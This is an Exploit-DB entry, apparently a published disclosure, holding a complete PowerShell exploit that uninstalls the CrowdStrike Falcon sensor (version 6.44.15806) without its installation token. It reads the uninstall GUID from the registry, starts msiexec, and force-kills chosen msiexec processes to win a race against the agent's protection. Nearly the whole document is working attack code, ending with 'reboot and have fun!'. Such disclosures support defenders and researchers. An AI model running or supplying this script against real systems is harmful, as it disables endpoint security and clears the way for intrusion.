CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token

EDB-ID:

51146




Platform:

Windows

Date:

2023-03-30


# Exploit Title: CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token 
# Date: 30/11/2022 
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) 
# Vendor Homepage: https://www.crowdstrike.com/ 
# Author Homepage: https://www.deda.cloud/ 
# Tested On: All Windows versions 
# Version: 6.44.15806 
# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. 


$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"

foreach($obj in $InstalledSoftware){
    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))
    {
        $uninstall_uuid = $obj.Name.Split("\")[6]
    }
}

$g_msiexec_instances = New-Object System.Collections.ArrayList

Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"

while($true)
{
	if (get-process -Name "CSFalconService") {
		Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
			
			if (-Not $g_msiexec_instances.contains($_.id)){
				$g_msiexec_instances.Add($_.id)
				if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){
					Start-Sleep -Milliseconds 100
					Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]
					stop-process -Force -Id $g_msiexec_instances[-1]				
				}

			}
		
		}
	} else { 
		Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
		break
	}
}